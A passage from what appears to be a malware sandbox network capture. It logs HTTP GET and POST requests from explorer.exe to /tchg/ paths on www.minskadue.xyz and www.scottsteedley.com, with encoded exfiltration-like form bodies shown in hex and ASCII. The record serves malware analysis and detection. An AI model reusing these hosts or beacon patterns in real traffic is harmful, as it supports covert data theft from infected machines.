2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are loo
                                                                                                                    May 30, 2023 11:11:17.366941929 CEST1171INData Raw: 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61
                                                                                                                    Data Ascii: king for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    6192.168.11.2049765109.123.121.24380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:08:16.675271988 CEST333OUTGET /tchg/?O0qEM=DJvKcwNMAiJtEMOFKIZqmDIH4j0MfehpVISF4oayj5HJP/icrRLtFKDL2L4p+A5+/b2o2lLyzfTNwEC6FKsE+wfmOuyyDckdRA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.minskadue.xyz
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:08:16.694511890 CEST333INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:08:16 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    60192.168.11.2049819162.214.206.20080C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:11:19.922746897 CEST1172OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.scottsteedley.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.scottsteedley.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.scottsteedley.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 31 77 6a 2d 6a 75 6a 56 6a 53 28 36 32 31 6d 70 48 46 4f 49 6a 73 61 46 6c 51 4f 56 4d 33 35 6c 5a 79 4b 59 41 7a 66 35 59 45 6f 35 72 46 31 79 37 74 36 68 4a 65 55 69 49 4e 4b 5a 44 44 50 51 56 62 72 4e 4f 2d 4d 38 6f 4f 72 4f 35 56 71 4d 78 55 6e 73 4b 37 53 4e 43 4b 55 37 6b 34 39 6c 48 31 4f 35 66 47 6e 49 7a 4d 53 4b 7a 42 70 4b 58 46 76 47 4e 61 7e 73 4f 51 38 55 36 74 56 79 65 70 6e 70 37 49 76 6e 53 4f 62 41 69 31 41 48 38 4f 64 6e 32 42 30 32 53 51 54 64 47 54 30 72 4e 32 7e 49 6c 6e 6f 73 62 46 64 74 4c 4b 4b 48 6d 55 4f 52 7a 33 44 67 61 35 5a 44 6f 31 4c 71 38 6f 68 51 61 75 52 49 52 4d 71 4d 32 69 75 58 75 37 7a 70 37 30 79 31 6d 69 70 52 45 59 7a 39 4e 6b 77 36 47 67 4d 58 75 42 6b 37 46 49 6b 70 4b 6d 58 43 69 54 6c 54 49 34 66 66 7e 64 75 78 43 47 69 4c 46 51 28 31 6d 37 63 6f 7a 71 44 47 31 38 4b 6a 58 42 44 61 4a 70 76 4f 39 74 66 37 59 50 50 48 64 5f 58 4e 4a 79 71 64 28 6c 71 79 71 79 54 54 46 38 56 58 32 4f 59 36 6c 56 33 55 63 79 36 49 4f 55 39 62 67 7a 63 79 6f 4c 52 6c 7a 42 7a 47 37 42 50 6b 37 44 79 79 73 6e 53 4e 35 71 6f 6c 6c 42 4b 64 35 6a 42 70 41 66 48 73 59 43 7e 48 52 4a 31 33 68 74 64 71 4a 5a 4d 73 52 4c 6c 52 65 68 45 5a 34 33 66 4c 4f 41 50 79 70 37 4b 43 79 55 52 31 30 54 53 32 55 53 32 53 6e 38 53 30 68 38 77 39 6b 5f 30 52 77 32 4c 74 61 4c 78 7a 47 38 53 5a 4c 75 31 71 5a 46 7e 77 35 53 46 55 65 4e 52 64 6a 73 43 51 7e 61 32 37 70 48 62 31 6e 34 58 36 32 71 6e 35 54 59 32 33 63 7a 77 38 76 45 39 33 49 72 37 43 69 64 31 6e 30 74 6f 74 7e 2d 76 4a 51 58 44 4b 4e 77 56 76 64 30 59 4f 49 72 41 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=1wj-jujVjS(621mpHFOIjsaFlQOVM35lZyKYAzf5YEo5rF1y7t6hJeUiINKZDDPQVbrNO-M8oOrO5VqMxUnsK7SNCKU7k49lH1O5fGnIzMSKzBpKXFvGNa~sOQ8U6tVyepnp7IvnSObAi1AH8Odn2B02SQTdGT0rN2~IlnosbFdtLKKHmUORz3Dga5ZDo1Lq8ohQauRIRMqM2iuXu7zp70y1mipREYz9Nkw6GgMXuBk7FIkpKmXCiTlTI4ff~duxCGiLFQ(1m7cozqDG18KjXBDaJpvO9tf7YPPHd_XNJyqd(lqyqyTTF8VX2OY6lV3Ucy6IOU9bgzcyoLRlzBzG7BPk7DyysnSN5qollBKd5jBpAfHsYC~HRJ13htdqJZMsRLlRehEZ43fLOAPyp7KCyUR10TS2US2Sn8S0h8w9k_0Rw2LtaLxzG8SZLu1qZF~w5SFUeNRdjsCQ~a27pHb1n4X62qn5TY23czw8vE93Ir7Cid1n0tot~-vJQXDKNwVvd0YOIrA.
                                                                                                                    May 30, 2023 11:11:20.090631962 CEST1173INHTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html
                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Tue, 30 May 2023 09:11:19 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1245
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are loo
                                                                                                                    May 30, 2023 11:11:20.090709925 CEST1174INData Raw: 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61
                                                                                                                    Data Ascii: king for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    61192.168.11.2049820162.214.206.20080C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:11:22.610615015 CEST1178OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.scottsteedley.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.scottsteedley.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.scottsteedley.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 31 77 6a 2d 6a 75 6a 56 6a 53 28 36 32 31 6d 70 48 46 4f 49 6a 73 61 46 6c 51 4f 56 4d 33 35 6c 5a 79 4b 59 41 7a 66 35 59 45 77 35 72 33 74 79 39 4f 53 68 49 65 55 69 4c 4e 4b 69 44 44 50 64 56 62 43 45 4f 2d 41 73 6f 4d 6a 4f 38 58 53 4d 78 69 62 73 50 37 53 41 4e 71 55 39 79 34 39 78 48 31 43 74 66 43 33 2d 7a 63 4f 4b 77 47 56 4b 47 43 44 46 44 71 7e 71 4f 51 38 59 6f 64 56 55 65 6f 54 35 37 49 7a 6e 53 4e 76 41 6a 47 34 48 36 65 68 6e 78 52 30 35 4c 41 54 6f 66 44 31 56 4e 32 37 5f 6c 6e 6f 53 62 45 5a 74 4c 4b 71 48 6e 53 47 53 7a 58 44 67 5a 35 5a 4d 73 31 47 6a 38 6f 74 49 61 76 31 49 52 4d 53 4d 33 43 75 58 72 61 7a 71 70 55 7a 77 73 43 70 47 41 59 33 31 4e 67 51 55 47 68 59 58 75 52 41 37 45 37 63 70 49 44 72 43 69 7a 6c 52 45 6f 66 32 77 4e 76 6f 43 47 79 74 46 55 4c 6c 6d 35 51 6f 7a 50 50 47 77 59 57 67 51 68 44 63 56 35 76 62 33 39 54 5f 59 50 28 44 64 5f 58 64 4a 7a 65 64 28 31 61 79 72 7a 54 53 47 73 56 63 7e 75 5a 36 28 6c 7a 4f 63 79 32 51 4f 55 56 4c 67 31 51 79 70 72 52 6c 31 67 7a 42 69 42 50 70 33 6a 79 67 6a 48 53 6b 35 71 6b 54 6c 46 54 5f 35 54 74 70 47 76 58 73 4a 69 7e 59 55 70 31 7a 76 4e 64 57 59 70 4d 73 52 4c 35 46 65 68 49 5a 34 46 66 4c 50 7a 58 79 69 4d 57 43 77 55 52 7a 30 54 53 72 55 53 36 78 6e 38 62 6a 68 34 4e 53 6b 39 34 52 7a 6d 33 74 5a 4b 78 79 57 38 54 54 50 75 30 38 58 6b 44 71 35 52 78 63 65 4e 42 72 6a 66 57 51 39 61 6d 37 28 33 62 32 74 34 58 78 7e 4b 6d 69 5a 34 71 72 63 7a 73 73 76 46 5a 6e 49 74 62 43 6e 70 59 76 76 65 67 54 6f 2d 72 59 54 69 7a 48 4e 57 4a 33 42 32 6b 75 4d 74 6d 61 46 65 31 5a 30 41 32 64 4a 31 55 42 59 63 4c 4a 77 72 53 48 6b 35 4a 51 6f 58 67 41 36 65 78 78 4d 6e 61 32 51 39 35 35 50 43 73 70 75 6c 67 61 66 37 6c 39 6e 42 69 71 4b 57 4c 55 62 6d 31 45 31 55 28 4a 36 43 55 62 58 4c 32 54 32 49 64 65 44 61 71 6d 78 59 70 57 76 6e 76 56 76 45 4e 4e 72 56 65 66 66 43 41 77 42 73 53 49 49 38 4b 6e 49 5f 4e 6d 6c 51 4a 42 49 51 74 75 6f 5f 79 50 48 74 66 78 79 2d 4e 56 76 64 77 75 69 51 6c 37 42 33 6c 45 5a 4d 79 4b 46 69 32 52 51 5f 36 6d 63 69 47 6b 56 6c 67 47 59 55 61 4b 47 37 34 6d 44 74 70 4b 37 73 6c 48 69 4f 46 57 62 6f 78 49 43 42 4b 6f 39 58 34 6c 76 71 33 46 67 43 4d 49 76 2d 78 73 34 4d 52 56 6f 32 59 56 56 5f 49 46 50 44 39 62 6d 43 6c 34 66 6f 50 66 59 4e 69 41 61 68 57 39 4e 52 71 34 67 7a 63 58 48 4c 47 4b 7e 46 64 37 31 48 67 41 53 77 5a 74 74 7a 62 38 77 47 43 54 71 6f 43 53 75 51 48 73 58 4a 6b 72 5a 54 42 56 31 34 55 75 67 70 59 6e 43 47 35 76 71 4f 49 4a 54 34 79 39 46 57 52 65 6b 30 52 4a 4d 4a 37 64 6d 41 54 6f 6b 32 52 48 73 48 31 35 68 68 47 56 42 66 67 67 51 76 38 4f 48 4c 6d 59 6a 41 5a 59 49 4b 72 69 6e 72 73 65 70 50 53 30 48 7a 36 6f 7e 56 4c 48 64 4d 44 5f 44 5a 48 30 44 45 5a 50 77 79 34 6c 64 70 67 5a 52 58 72 45 42 53 47 4c 73 46 46 66 57 49 59 5f 68 33 52 47 41 35 34 66 55 72 41 68 39 50 59 4d 54 48 67 73 46 48 6d 68 75 6b 76 71 48 48 55 55 4f 51 70 68 30 68 66 38 4f 6b 53 5a 33 6d 33 38 66 67 72 35 34 5a 77 39 39 6b 4a 71 79 68 34 62 4b 65 33 72 71 69 62 4d 31 70 4b 39 53 4f 62 35 4a 56 4d 46 66 70 33 5a 4b 70 44 77 49 68 4b 5f 76 37 64 33 77 44 55 5a 52 4d 6c 55 57 74 4c 30 63 53 5a 5f 45 5a 64 74 52 76 78 33 76 55 7a 4b 76 6b 45 68 6e 41 4d 47 45 53 42 63 39 36 47 33 52 57 4d 5f 63 4b 78 77 4e 70 4a 52 4a 33 55 6d 6d 31 43 49 6f 62 4b 36 67 62 4c 5a 55 50 34 64 53 47 42 6e 72 59 35 56 5a 71 50 36 46 38 32 70 67 43 51 61 7a 30 75 37 56 35 75 67 6a 74 36 69 4b 64 4d 6f 71 64 77 74 4d 48 76 4d 53 52 37 78 39 67 59 73 70 76 75 33 52 2d 54 55 75 46 7e 77 4d 36 6b 53 28 47 46 69 7e 30 35 55 7e 75 76 59 63 76 52 66 68 79 35 45 76 6b 57 30 53 39 6a 73 77 7a 75 4f 75 6f 56 61 50 64 73 78 5a 30 32 56 32 75 63 61 61 62 63 6c 6e 44 4c 58 54 71 7a 31 79 6f 56 57 6f 4f 61 78 6a 52 6a 2d 44 6a 46 35 49 77 76 70 45 63 79 6c 6d 30 72 61 52 49 74 73 55 33 39 5f 5a 39 4c 35 6c 31 72 62 51 76 7e 57 4e 76 73 6e 35 67 4a 4f 7a 43 31 66 28 43 54 36 36 54 53 37 43 36 6e 2d 61 5a 32 75 78 72 28 45 6b 57 46 50 51 6d 41 51 55 59 42 5a 61 70 68 4f 56 4b 50 4a 36 47 69 36 53 74 45 6a 46 35 30 34 38 58 34 56 33 6e 28 75 7a
                                                                                                                    Data Ascii: O0qEM=1wj-jujVjS(621mpHFOIjsaFlQOVM35lZyKYAzf5YEw5r3ty9OShIeUiLNKiDDPdVbCEO-AsoMjO8XSMxibsP7SANqU9y49xH1CtfC3-zcOKwGVKGCDFDq~qOQ8YodVUeoT57IznSNvAjG4H6ehnxR05LATofD1VN27_lnoSbEZtLKqHnSGSzXDgZ5ZMs1Gj8otIav1IRMSM3CuXrazqpUzwsCpGAY31NgQUGhYXuRA7E7cpIDrCizlREof2wNvoCGytFULlm5QozPPGwYWgQhDcV5vb39T_YP(Dd_XdJzed(1ayrzTSGsVc~uZ6(lzOcy2QOUVLg1QyprRl1gzBiBPp3jygjHSk5qkTlFT_5TtpGvXsJi~YUp1zvNdWYpMsRL5FehIZ4FfLPzXyiMWCwURz0TSrUS6xn8bjh4NSk94Rzm3tZKxyW8TTPu08XkDq5RxceNBrjfWQ9am7(3b2t4Xx~KmiZ4qrczssvFZnItbCnpYvvegTo-rYTizHNWJ3B2kuMtmaFe1Z0A2dJ1UBYcLJwrSHk5JQoXgA6exxMna2Q955PCspulgaf7l9nBiqKWLUbm1E1U(J6CUbXL2T2IdeDaqmxYpWvnvVvENNrVeffCAwBsSII8KnI_NmlQJBIQtuo_yPHtfxy-NVvdwuiQl7B3lEZMyKFi2RQ_6mciGkVlgGYUaKG74mDtpK7slHiOFWboxICBKo9X4lvq3FgCMIv-xs4MRVo2YVV_IFPD9bmCl4foPfYNiAahW9NRq4gzcXHLGK~Fd71HgASwZttzb8wGCTqoCSuQHsXJkrZTBV14UugpYnCG5vqOIJT4y9FWRek0RJMJ7dmATok2RHsH15hhGVBfggQv8OHLmYjAZYIKrinrsepPS0Hz6o~VLHdMD_DZH0DEZPwy4ldpgZRXrEBSGLsFFfWIY_h3RGA54fUrAh9PYMTHgsFHmhukvqHHUUOQph0hf8OkSZ3m38fgr54Zw99kJqyh4bKe3rqibM1pK9SOb5JVMFfp3ZKpDwIhK_v7d3wDUZRMlUWtL0cSZ_EZdtRvx3vUzKvkEhnAMGESBc96G3RWM_cKxwNpJRJ3Umm1CIobK6gbLZUP4dSGBnrY5VZqP6F82pgCQaz0u7V5ugjt6iKdMoqdwtMHvMSR7x9gYspvu3R-TUuF~wM6kS(GFi~05U~uvYcvRfhy5EvkW0S9jswzuOuoVaPdsxZ02V2ucaabclnDLXTqz1yoVWoOaxjRj-DjF5IwvpEcylm0raRItsU39_Z9L5l1rbQv~WNvsn5gJOzC1f(CT66TS7C6n-aZ2uxr(EkWFPQmAQUYBZaphOVKPJ6Gi6StEjF5048X4V3n(uzuWjmdz79CoHQfsZTxPYf0L6LBWM5Ts8BQ5qgTW7PxdhMhHbTy2t5GLSSAbGs313o8g4fmMuns1eYMEim6(k(qjD68Iyn6EUoh~Ir6e0p9TenM49KjP12YE5UYkY6smoSxr8o_eCEk9JSKRSo8pM(FGs~eFxju7T~0AhwbVBU4cOqGvyinpH582WbjKypqhx8IjRMl6eU_Y9nLkiDcCWHEXnI9XE~V~h3UgopCNcwxcys8CxYTAsMKAS8CUx0WkNoXq36WTsK88K(ETT4XQ-XliqrZ3YTTBDGwya07ByKW1als3o3ayAlGOIvUKF2EdmdUjODFyfj04YC4kf4cBC1qIyXaWHMPUcisvI5W8WEPxlZ0NamwdW3bOuObElVsZnDshzMxkRdz3Tewp-JtZeKmjKLEAt7gV4GKYXADTwSX08T7bGtscoEEvUtKY0wWZlGUsCPS(jhHs6JngiEpjJc6qoQ7gpwl7p8C65ipGsmOqSXyFVCx49D-W7aReBrfupzXVfJGZ2lJfOcR74IlMNMFn3QAa9lgOY0Bu5VPxYlnAh0egePU1OC7BTBQLuAYjrZP7s(sSQF8HfwKJihEbVNuSR7Q0Jgaz5uxAVUDGt2kuLgTrWsyZxBWc_snf8sPaDF44MPnCss5dj1zUOhv(tewv3FxyKRAkxvtJtEJfhycCDmjXCefAhxJP9qQRDl7BFCn8ktPhnvx6Msbz05D~SL67cPMAaHbeDqad9xOffx31Fp2RD~oiEYnt9t7YFHnDWAW3pfO7ghLASE7QZsAguDh8xtYHxwJrFANUrqLgnUYybvTioxpu1gwVWQizoGqE_sTBVXX2DdCxvl82SalMLnJhRQa43EBiq26Dpt2I-fv6AFeawj4Ilt031zPUxswKFqKW6hzXoh0DLE-EH~YdGV4VZMLgsP6TPo3cCi30n0sdfRYbmoMfEm5spwLvb8dtviuFx8AivOnpS03SuvyObrm0tUbciS2l3T52l~XTDJr3lORBopqSF~z8X84JlAdmkK2K70C6cocREPdHpG-985abXQSebayzXBHFl7v30c7u6ixXJiJo1gyl_O5USsjcVoFDdFJSukqzunoAFqddsM2KqTa1zAUj_yRnTRRRPNLvakJ024-452TqHgh426wy5q4SOQngkmTJboAMkoLbrZ30-opZMaejxef52a_O2OpxfrsDOcDf7yDnF~IEAkOd4KxIGCQPers0GwEA4ISC2Jnva1zK3LadgjnHm4B24spseBSYiFIT9fzvD7H9HvfN6x_BmwSkxD3Q9E1fzI5VxBM57aPQ_WD~fDW4xCrzLyxREA8sc0AB5Al3mV5Owb04mnx56LksOWuhi2j0FtMT5~2X9btvhTXxSDPQkneOy3q0OgF8wV70pHu(-2u4N89rXY7O_VW~hJIccXvT2KY7BhBz7IH(n0RhUwd0hXP0stsXjSLap2OOs1Ehpk6ne5ZDVDRNJN2(zd0xBEOryw3xyYpDHzOARS2mK~CHeLq(28ieCJOziZRnGPmaCXiVofrbjtnjAO6Ebbnl9AVfOwymK9Rwp5R(nkDk-HWYg4-9H6kxqQY7T7LGz1HeJiMGt9hkcwrm9xkEs6wQWyWtQBDJ1N8LPyZG6bQPSGfwW214EHV9SDn7BPb0DwHwuRp3Enz~GCg8nSzEZ5OWKbfpxxyX9wJ6boCH4AdKl2mpaWVnYXn4eut7PMRlmOjPCTRdjoP~VUpUHHnQw(Kq5hoFcVhOt2lKRwJa0fENNbhJDci0e9bxLvku3eY4XljmuiuSDFwdhf7Yep4Lo3AW6u0tzbJ(OWT0D6F6oQZ9Bl1o3DuysykxfuddHzxAFEwgoE-4N0m0sTHB2qOB7k8~NGfNFpCgwRm5qFLzSDAmAdCA5p-hwGyvGkJZ64P3ozFCYWREZMJkFPIVeaKWGz5aQt92rssqLG2iEbKoGdHV45z5LAI0IHYqXBsmZGtb9Gh9wWW0_GeSeg7JAevxdEH12KL3xusVAZUMED7cR4ILjlFPwjy(hc7(VQkqbRHwyNPLRkpTgYa(5Xp2XQX2CX36MzUkT1vMq0zn8oObHCt(RsLMfp47
                                                                                                                    May 30, 2023 11:11:22.610696077 CEST1182OUTData Raw: 61 28 36 4c 36 78 54 56 2d 61 38 6d 75 4c 61 4d 58 4c 49 6c 69 42 72 6f 7a 68 70 73 65 4b 50 7e 67 72 50 69 53 37 62 75 51 67 35 50 6c 4a 53 51 39 59 6f 6b 5f 72 41 74 46 4a 6b 49 4b 4b 52 32 31 41 67 34 50 41 55 4f 35 46 46 6d 50 43 6e 39 30 44
